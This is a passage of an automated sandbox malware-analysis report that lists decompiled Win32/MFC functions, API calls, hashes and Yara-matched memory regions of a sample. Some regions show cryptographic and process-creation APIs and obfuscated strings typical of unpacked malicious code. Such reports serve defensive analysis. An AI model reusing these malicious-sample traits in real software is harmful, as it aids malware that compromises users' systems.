                  			E00418BD1(void* __ecx, int _a4, int _a8) {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				int _t12;
                  				void* _t15;
                  				void* _t16;
                  				int _t19;
                  				void* _t20;
                  
                  				_t17 = __ecx;
                  				_t19 = _a4;
                  				_t22 = _t19;
                  				if(_t19 == 0) {
                  					E00406436(_t15, __ecx, _t19, _t20, _t22);
                  				}
                  				_t16 = E0040EE3C(_t15, _t17, GetParent( *(_t19 + 0x20)));
                  				_t18 = _t16;
                  				if(E0041E99D(_t16, ?str?) != 0) {
                  					__eflags = _a8;
                  					if(_a8 != 0) {
                  						L8:
                  						return _t16;
                  					}
                  					while(1) {
                  						_t19 = E0040EE3C(_t16, _t18, GetParent( *(_t19 + 0x20)));
                  						__eflags = _t19;
                  						if(_t19 == 0) {
                  							goto L8;
                  						}
                  						_t12 = IsIconic( *(_t19 + 0x20));
                  						__eflags = _t12;
                  						if(_t12 != 0) {
                  							goto L3;
                  						}
                  					}
                  					goto L8;
                  				} else {
                  					L3:
                  					return 0;
                  				}
                  			}

                  APIs
                  • GetParent.USER32(?), ref: 00418BEE
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • IsIconic.USER32 ref: 00418C17
                  • GetParent.USER32(?), ref: 00418C24
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Parent$Exception@8H_prolog3IconicThrow
                  • String ID: `&E
                  • API String ID: 144390861-1929257993
                  • Opcode ID: 3561b35d5b5b2dccbb8c54f4d40102134b81d5a0a069d7fdc0debe60c0056d39
                  • Instruction ID: 358e4306ae026a5a0e6fe1444b68b5067069f487fe9c63fcbe7e632c9dba3896
                  • Opcode Fuzzy Hash: 3561b35d5b5b2dccbb8c54f4d40102134b81d5a0a069d7fdc0debe60c0056d39
                  • Instruction Fuzzy Hash: C3F0A4353012096BDB202B73CC44A57BB5AEB903A4B11443FF80897210FE38DC5196F8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E0040C49C(struct HWND__* _a4, signed int _a8) {
                  				struct _WINDOWPLACEMENT _v48;
                  				int _t16;
                  
                  				if(E0040C354() == 0) {
                  					if((_a8 & 0x00000003) == 0) {
                  						if(IsIconic(_a4) == 0) {
                  							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
                  						} else {
                  							_t16 = GetWindowPlacement(_a4,  &_v48);
                  						}
                  						if(_t16 == 0) {
                  							return 0;
                  						} else {
                  							return E0040C44B( &(_v48.rcNormalPosition), _a8);
                  						}
                  					}
                  					return 0x12340042;
                  				}
                  				return  *0x46631c(_a4, _a8);
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID: )@
                  • API String ID: 0-1834664782
                  • Opcode ID: 04563866b8390392b53dc5f501e0bdb632abd845a72dbd0a999c9ac41fcd9bfc
                  • Instruction ID: e39f0cd06dcc5d796e4c380b87086b00b9923f70f7885cf755144c167b23d7c0
                  • Opcode Fuzzy Hash: 04563866b8390392b53dc5f501e0bdb632abd845a72dbd0a999c9ac41fcd9bfc
                  • Instruction Fuzzy Hash: 14F01D35500108FBCF019FA1DC989BE7B69BB04344B548132FC15E51A0EB38DA56DB5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CryptDuplicateHash.ADVAPI32(00000000,00000000,?), ref: 023E21BE
                  • CryptDecrypt.ADVAPI32(?,00000001,00000000,?,?), ref: 023E21EC
                  • CryptVerifySignatureW.ADVAPI32(?,?,00000060,00000000,00000000), ref: 023E2208
                  • CryptDestroyHash.ADVAPI32(?), ref: 023E2219
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Hash$DecryptDestroyDuplicateSignatureVerify
                  • String ID:
                  • API String ID: 1014757615-0
                  • Opcode ID: 2203719cffdfeb0537e97bb009c77dd307c149177690b17048eaed3ed2eab3e1
                  • Instruction ID: e46b43cbf383eee8fe55c0cbc8bb350442ebd8a6366a6cf953b86fabd051d90f
                  • Opcode Fuzzy Hash: 2203719cffdfeb0537e97bb009c77dd307c149177690b17048eaed3ed2eab3e1
                  • Instruction Fuzzy Hash: 20318D71B50124EFDF218F68DC40BAA7BAEEF48710F104555EA06EB2D1D771AE158B50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CryptAcquireContextW.ADVAPI32(023F26E0,00000000,00000000,00000018,F0000040), ref: 023E1F8E
                  • CryptImportKey.ADVAPI32(?,?,00000000,00000000,023F26E4), ref: 023E1FD1
                  • LocalFree.KERNEL32(?), ref: 023E1FDC
                  • CryptReleaseContext.ADVAPI32(00000000), ref: 023E1FED
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$AcquireFreeImportLocalRelease
                  • String ID:
                  • API String ID: 3512700226-0
                  • Opcode ID: 92a8d68dbde839f7d5bde5734d276593e8e5b29dd1628249eb8b3a1bf3aa9878
                  • Instruction ID: fa4de337dee8a4ef0db6b2c5e21a8a3fbadece88791fbdd903446ac550e4ef38
                  • Opcode Fuzzy Hash: 92a8d68dbde839f7d5bde5734d276593e8e5b29dd1628249eb8b3a1bf3aa9878
                  • Instruction Fuzzy Hash: C4018F71A80258BBEBB10B96EC09F9B7F7CEB85B51F000155FB09B1090DBB14E21DBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CryptDuplicateHash.ADVAPI32(00000000,00000000,?), ref: 023E20CC
                  • CryptEncrypt.ADVAPI32(?,00000001,00000000,?,?,?), ref: 023E20FD
                  • CryptDestroyHash.ADVAPI32(?), ref: 023E2139
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Hash$DestroyDuplicateEncrypt
                  • String ID:
                  • API String ID: 1128268866-0
                  • Opcode ID: 2b2c6395ff771a075eedcfaac6c39775b4701074dc5db83de4cb18860ecde3f6
                  • Instruction ID: b31e327e4a28f0287748c817f0799fc87201e5939b8fb258b16688bb8c73b97f
                  • Opcode Fuzzy Hash: 2b2c6395ff771a075eedcfaac6c39775b4701074dc5db83de4cb18860ecde3f6
                  • Instruction Fuzzy Hash: 75216FB5A40215EFDF209F64EC40AAABBBEEF04350F144655ED0A8B290EB70DE55CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CryptExportKey.ADVAPI32(?,?,00000001,00000040,?,?), ref: 023E1F2F
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptExport
                  • String ID: l
                  • API String ID: 3389274496-2517025534
                  • Opcode ID: 236d1d48d83456ec22b7d8e0d932c27f8c638a9ebcf8215bceda48f13ee1152f
                  • Instruction ID: 63b41f0ad15ff883f3e536dee2b202124345f6feaec9f92dd600477e2c5ecbde
                  • Opcode Fuzzy Hash: 236d1d48d83456ec22b7d8e0d932c27f8c638a9ebcf8215bceda48f13ee1152f
                  • Instruction Fuzzy Hash: 1DF02770900228AADF10DA64C844FFEBBBDDB01A04F10029AED46E7180E670AE0987D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,?), ref: 023E1D8A
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,?), ref: 023E1DBA
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateProcess$User
                  • String ID:
                  • API String ID: 4042571897-0
                  • Opcode ID: bec3e7c349587959f3f3a5d667ce40e4d702164f44e17a31be0c72cee9323074
                  • Instruction ID: ae2ac06b7a0ce37aa17b41ea6ab59d3da5e809432c51fcdedcd5433f9036f37a
                  • Opcode Fuzzy Hash: bec3e7c349587959f3f3a5d667ce40e4d702164f44e17a31be0c72cee9323074
                  • Instruction Fuzzy Hash: A31160B1A01128BBCF209E969C08DEFBFBDEF85750F144016FA09A2240D6704D16DBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 023E1F6B
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptHashParam
                  • String ID:
                  • API String ID: 1839025277-0
                  • Opcode ID: 40122b5b0a7fcf9669c5d7933e56c3566cb188d6ffa2182b30297815d72d5629
                  • Instruction ID: 434fa287ae2927df5fd486419fa217eedea6ecf332b42c5b64eb4b0000fe26d8
                  • Opcode Fuzzy Hash: 40122b5b0a7fcf9669c5d7933e56c3566cb188d6ffa2182b30297815d72d5629
                  • Instruction Fuzzy Hash: 68C012B055030CBBE614CB40DD0AFBA776CD744714F404288BE045229196B15E1055B1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00430191(intOrPtr* __ecx) {
                  				intOrPtr* _t26;
                  
                  				_t26 = __ecx;
                  				 *_t26 = RegisterClipboardFormatA("Native");
                  				 *((intOrPtr*)(_t26 + 4)) = RegisterClipboardFormatA("OwnerLink");
                  				 *((intOrPtr*)(_t26 + 8)) = RegisterClipboardFormatA("ObjectLink");
                  				 *((intOrPtr*)(_t26 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
                  				 *((intOrPtr*)(_t26 + 0x10)) = RegisterClipboardFormatA("Embed Source");
                  				 *((intOrPtr*)(_t26 + 0x14)) = RegisterClipboardFormatA("Link Source");
                  				 *((intOrPtr*)(_t26 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
                  				 *((intOrPtr*)(_t26 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
                  				 *((intOrPtr*)(_t26 + 0x20)) = RegisterClipboardFormatA("FileName");
                  				 *((intOrPtr*)(_t26 + 0x24)) = RegisterClipboardFormatA("FileNameW");
                  				 *((intOrPtr*)(_t26 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
                  				 *((intOrPtr*)(_t26 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
                  				return _t26;
                  			}

                  APIs
                  • RegisterClipboardFormatA.USER32 ref: 004301A2
                  • RegisterClipboardFormatA.USER32 ref: 004301AB
                  • RegisterClipboardFormatA.USER32 ref: 004301B5
                  • RegisterClipboardFormatA.USER32 ref: 004301BF
                  • RegisterClipboardFormatA.USER32 ref: 004301C9
                  • RegisterClipboardFormatA.USER32 ref: 004301D3
                  • RegisterClipboardFormatA.USER32 ref: 004301DD
                  • RegisterClipboardFormatA.USER32 ref: 004301E7
                  • RegisterClipboardFormatA.USER32 ref: 004301F1
                  • RegisterClipboardFormatA.USER32 ref: 004301FB
                  • RegisterClipboardFormatA.USER32 ref: 00430205
                  • RegisterClipboardFormatA.USER32 ref: 0043020F
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClipboardFormatRegister
                  • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                  • API String ID: 1228543026-2889995556
                  • Opcode ID: fe36e97890d272e0b85133efa5dbb91bef24085a6194f4f7bdb9aff7e4589271
                  • Instruction ID: 7eabd4f5f4dbb38bd0e4f7e30e0aa98beb580e07856e0c8e74aebad56863afda
                  • Opcode Fuzzy Hash: fe36e97890d272e0b85133efa5dbb91bef24085a6194f4f7bdb9aff7e4589271
                  • Instruction Fuzzy Hash: 2501E174E41B55B6C7106F729C1D91A7EA1FE447617604927A41C87641DBBCE054CFC8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E00410CBA(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t54;
                  				signed int _t56;
                  				signed int _t59;
                  				long _t60;
                  				signed int _t64;
                  				void* _t66;
                  				signed int _t72;
                  				signed int _t74;
                  				signed int _t76;
                  				long _t83;
                  				signed int _t86;
                  				signed short _t87;
                  				signed int _t88;
                  				int _t94;
                  				void* _t106;
                  				long* _t108;
                  				long _t110;
                  				signed int _t111;
                  				CHAR* _t112;
                  				intOrPtr _t113;
                  				void* _t116;
                  				void* _t119;
                  				intOrPtr _t120;
                  
                  				_t119 = __eflags;
                  				_t105 = __edi;
                  				_push(0x148);
                  				E00431B04(E0044B0DA, __ebx, __edi, __esi);
                  				_t110 =  *(_t116 + 0x10);
                  				_t94 =  *(_t116 + 0xc);
                  				_push(0x406452);
                  				 *(_t116 - 0x120) = _t110;
                  				_t54 = E00420AEC(_t94, 0x466508, __edi, _t110, _t119);
                  				_t120 = _t54;
                  				_t97 = 0 | _t120 == 0x00000000;
                  				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
                  				_t121 = _t120 == 0;
                  				if(_t120 == 0) {
                  					_t54 = E00406436(_t94, _t97, __edi, _t110, _t121);
                  				}
                  				if( *(_t116 + 8) == 3) {
                  					_t106 =  *_t110;
                  					_t111 =  *(_t54 + 0x14);
                  					_t56 =  *(E0041F363(_t94, _t106, _t111, __eflags) + 0x14) & 0x000000ff;
                  					 *(_t116 - 0x124) = _t56;
                  					__eflags = _t111;
                  					if(_t111 != 0) {
                  						L7:
                  						__eflags =  *0x4668d4;
                  						if( *0x4668d4 == 0) {
                  							L12:
                  							__eflags = _t111;
                  							if(__eflags == 0) {
                  								__eflags =  *0x4664a4;
                  								if( *0x4664a4 != 0) {
                  									L19:
                  									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x4664a4; // 0x8000
                  									if(__eflags != 0) {
                  										L23:
                  										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                  										 *(_t116 - 0x14) = _t59;
                  										__eflags = _t59;
                  										if(_t59 != 0) {
                  											_t112 = "AfxOldWndProc423";
                  											_t64 = GetPropA(_t94, _t112);
                  											__eflags = _t64;
                  											if(_t64 == 0) {
                  												SetPropA(_t94, _t112,  *(_t116 - 0x14));
                  												_t66 = GetPropA(_t94, _t112);
                  												__eflags = _t66 -  *(_t116 - 0x14);
                  												if(_t66 ==  *(_t116 - 0x14)) {
                  													GlobalAddAtomA(_t112);
                  													SetWindowLongA(_t94, 0xfffffffc, E00410B6D);
                  												}
                  											}
                  										}
                  										L27:
                  										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
                  										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
                  										__eflags =  *(_t116 - 0x124);
                  										_t110 = _t60;
                  										if( *(_t116 - 0x124) != 0) {
                  											UnhookWindowsHookEx( *(_t105 + 0x28));
                  											_t50 = _t105 + 0x28;
                  											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
                  											__eflags =  *_t50;
                  										}
                  										goto L30;
                  									}
                  									goto L27;
                  								}
                  								_t113 = 0x30;
                  								E00431160(_t106, _t116 - 0x154, 0, _t113);
                  								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
                  								_push(_t116 - 0x154);
                  								_push("#32768");
                  								_push(0);
                  								_t72 = E0040D4AB(_t94, _t97, _t106, "#32768", __eflags);
                  								 *0x4664a4 = _t72;
                  								__eflags = _t72;
                  								if(_t72 == 0) {
                  									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
                  									__eflags = _t74;
                  									if(_t74 == 0) {
                  										goto L23;
                  									}
                  									 *((char*)(_t116 - 0x19)) = 0;
                  									_t76 = E004336E0(_t116 - 0x118, "#32768");
                  									__eflags = _t76;
                  									if(_t76 == 0) {
                  										goto L27;
                  									}
                  									goto L23;
                  								}
                  								goto L19;
                  							}
                  							E0041F3AF(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
                  							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
                  							E0040EE89(_t111, _t94);
                  							 *((intOrPtr*)( *_t111 + 0x50))();
                  							_t108 =  *((intOrPtr*)( *_t111 + 0xf8))();
                  							_t83 = SetWindowLongA(_t94, 0xfffffffc, E0040F720);
                  							__eflags = _t83 - E0040F720;
                  							if(_t83 != E0040F720) {
                  								 *_t108 = _t83;
                  							}
                  							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
                  							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
                  							__eflags =  *(_t116 - 0x14);
                  							if( *(_t116 - 0x14) != 0) {
                  								_push( *(_t116 - 0x18));
                  								_push(0);
                  								E0041EAC0();
                  							}
                  							goto L27;
                  						}
                  						_t86 = GetClassLongA(_t94, 0xffffffe6);
                  						__eflags = _t86 & 0x00010000;
                  						if((_t86 & 0x00010000) != 0) {
                  							goto L27;
                  						}
                  						_t87 =  *(_t106 + 0x28);
                  						__eflags = _t87 - 0xffff;
                  						if(_t87 <= 0xffff) {
                  							 *(_t116 - 0x18) = 0;
                  							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
                  							_t87 = _t116 - 0x18;
                  						}
                  						_t88 = E0040D6F3(_t87, "ime");
                  						_pop(_t97);
                  						__eflags = _t88;
                  						if(_t88 == 0) {
                  							goto L27;
                  						}
                  						goto L12;
                  					}
                  					__eflags =  *(_t106 + 0x20) & 0x40000000;
                  					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
                  						goto L27;
                  					}
                  					__eflags = _t56;
                  					if(_t56 != 0) {
                  						goto L27;
                  					}
                  					goto L7;
                  				} else {
                  					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
                  					L30:
                  					return E00431B87(_t94, _t105, _t110);
                  				}
                  			}



























                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00410CC4
                    • Part of subcall function 00420AEC: __EH_prolog3.LIBCMT ref: 00420AF3
                  • CallNextHookEx.USER32 ref: 00410D08
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • GetClassLongA.USER32 ref: 00410D4C
                  • GlobalGetAtomNameA.KERNEL32 ref: 00410D76
                  • SetWindowLongA.USER32 ref: 00410DCB
                  • _memset.LIBCMT ref: 00410E15
                  • GetClassLongA.USER32 ref: 00410E45
                  • GetClassNameA.USER32(?,?,00000100), ref: 00410E66
                  • GetWindowLongA.USER32 ref: 00410E8A
                  • GetPropA.USER32 ref: 00410EA4
                  • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 00410EAF
                  • GetPropA.USER32 ref: 00410EB7
                  • GlobalAddAtomA.KERNEL32 ref: 00410EBF
                  • SetWindowLongA.USER32 ref: 00410ECD
                  • CallNextHookEx.USER32 ref: 00410EE5
                  • UnhookWindowsHookEx.USER32(?), ref: 00410EF9
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                  • String ID: #32768$AfxOldWndProc423$ime
                  • API String ID: 1191297049-4034971020
                  • Opcode ID: e5ae81d980a84f8551ec54e42acd0f54d674218401d2fe6b82eb2adcea4507fa
                  • Instruction ID: 32270c68322271c2e59bf9d54f63d676ca0dffc6bbc1c643ca40a15bfc5c9aae
                  • Opcode Fuzzy Hash: e5ae81d980a84f8551ec54e42acd0f54d674218401d2fe6b82eb2adcea4507fa
                  • Instruction Fuzzy Hash: 1061E43150031AABCB219B62DC09BEF7B78FF05325F100566F505A6291DBB8DAC1CBAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 023E9CDE
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ro$!x,5$)Zk$,UiB$:@Q^$;.\$>7$@}$SL2X$]|F,$c$tW/$u-0V${!*2$YsV$^qr
                  • API String ID: 1029625771-3671267125
                  • Opcode ID: f0c98bba408d365c3d39793b58438ca7727ec4ca2c6bac6694add71fa4d79833
                  • Instruction ID: a54907bc7758daa0eb944bcb75305b91311134d3d2446fd37fc4abf3892deea6
                  • Opcode Fuzzy Hash: f0c98bba408d365c3d39793b58438ca7727ec4ca2c6bac6694add71fa4d79833
                  • Instruction Fuzzy Hash: 9872B5F48567A98FDB61CF419E8478EBB35BB51305F5082C8C26C3A214CB750B86CF8A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 97%
                  			E0040C354() {
                  				void* __ebx;
                  				void* __esi;
                  				void* _t5;
                  				_Unknown_base(*)()* _t6;
                  				_Unknown_base(*)()* _t7;
                  				_Unknown_base(*)()* _t8;
                  				_Unknown_base(*)()* _t9;
                  				_Unknown_base(*)()* _t10;
                  				_Unknown_base(*)()* _t11;
                  				_Unknown_base(*)()* _t12;
                  				signed int _t16;
                  				signed int _t17;
                  				struct HINSTANCE__* _t19;
                  				void* _t21;
                  				void* _t24;
                  				void* _t25;
                  
                  				_t17 = _t16 ^ _t16;
                  				_t24 =  *0x466334 - _t17; // 0x0
                  				if(_t24 == 0) {
                  					_push(_t21);
                  					 *0x466338 = E0040C2FA(_t17, _t21, __eflags);
                  					_t19 = GetModuleHandleA("USER32");
                  					__eflags = _t19 - _t17;
                  					if(_t19 == _t17) {
                  						L12:
                  						 *0x466318 = _t17;
                  						 *0x46631c = _t17;
                  						 *0x466320 = _t17;
                  						 *0x466324 = _t17;
                  						 *0x466328 = _t17;
                  						 *0x46632c = _t17;
                  						 *0x466330 = _t17;
                  						_t5 = 0;
                  					} else {
                  						_t6 = GetProcAddress(_t19, "GetSystemMetrics");
                  						 *0x466318 = _t6;
                  						__eflags = _t6 - _t17;
                  						if(_t6 == _t17) {
                  							goto L12;
                  						} else {
                  							_t7 = GetProcAddress(_t19, "MonitorFromWindow");
                  							 *0x46631c = _t7;
                  							__eflags = _t7 - _t17;
                  							if(_t7 == _t17) {
                  								goto L12;
                  							} else {
                  								_t8 = GetProcAddress(_t19, "MonitorFromRect");
                  								 *0x466320 = _t8;
                  								__eflags = _t8 - _t17;
                  								if(_t8 == _t17) {
                  									goto L12;
                  								} else {
                  									_t9 = GetProcAddress(_t19, "MonitorFromPoint");
                  									 *0x466324 = _t9;
                  									__eflags = _t9 - _t17;
                  									if(_t9 == _t17) {
                  										goto L12;
                  									} else {
                  										_t10 = GetProcAddress(_t19, "EnumDisplayMonitors");
                  										 *0x46632c = _t10;
                  										__eflags = _t10 - _t17;
                  										if(_t10 == _t17) {
                  											goto L12;
                  										} else {
                  											_t11 = GetProcAddress(_t19, "GetMonitorInfoA");
                  											 *0x466328 = _t11;
                  											__eflags = _t11 - _t17;
                  											if(_t11 == _t17) {
                  												goto L12;
                  											} else {
                  												_t12 = GetProcAddress(_t19, "EnumDisplayDevicesA");
                  												 *0x466330 = _t12;
                  												__eflags = _t12 - _t17;
                  												if(_t12 == _t17) {
                  													goto L12;
                  												} else {
                  													_t5 = 1;
                  													__eflags = 1;
                  												}
                  											}
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  					 *0x466334 = 1;
                  					return _t5;
                  				} else {
                  					_t25 =  *0x466328 - _t17; // 0x0
                  					return 0 | _t25 != 0x00000000;
                  				}
                  			}




















                  APIs
                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,745F5D80,0040C4A9,?,?,?,?,?,?,?,0040E929,00000000,00000002,00000028), ref: 0040C37F
                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0040C39B
                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0040C3AC
                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0040C3BD
                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040C3CE
                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040C3DF
                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040C3F0
                  • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0040C401
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                  • API String ID: 667068680-68207542
                  • Opcode ID: 3e63bc07579a273cf3458e94ca2d048ab89fd83f7511a7af2d42a1a611f821d8
                  • Instruction ID: 97ffdccdbcf6cb09da46b2faea870da2eca337babe3f4635d63e23a0ead0a9a5
                  • Opcode Fuzzy Hash: 3e63bc07579a273cf3458e94ca2d048ab89fd83f7511a7af2d42a1a611f821d8
                  • Instruction Fuzzy Hash: 792150B1E10260ABC3115FB5ACC482A7EE8B28CB05362453FEC01E3352E3B850C99E5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E0040B10C(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				CHAR* _t148;
                  				void* _t157;
                  				int _t191;
                  				int _t223;
                  				int _t225;
                  				int _t227;
                  				int _t230;
                  				intOrPtr* _t240;
                  				intOrPtr* _t241;
                  				intOrPtr* _t249;
                  				intOrPtr* _t250;
                  				signed int* _t252;
                  				int _t259;
                  				int _t261;
                  				void* _t264;
                  				int _t314;
                  				int _t339;
                  				int _t340;
                  				int _t346;
                  				struct HWND__** _t347;
                  				int _t348;
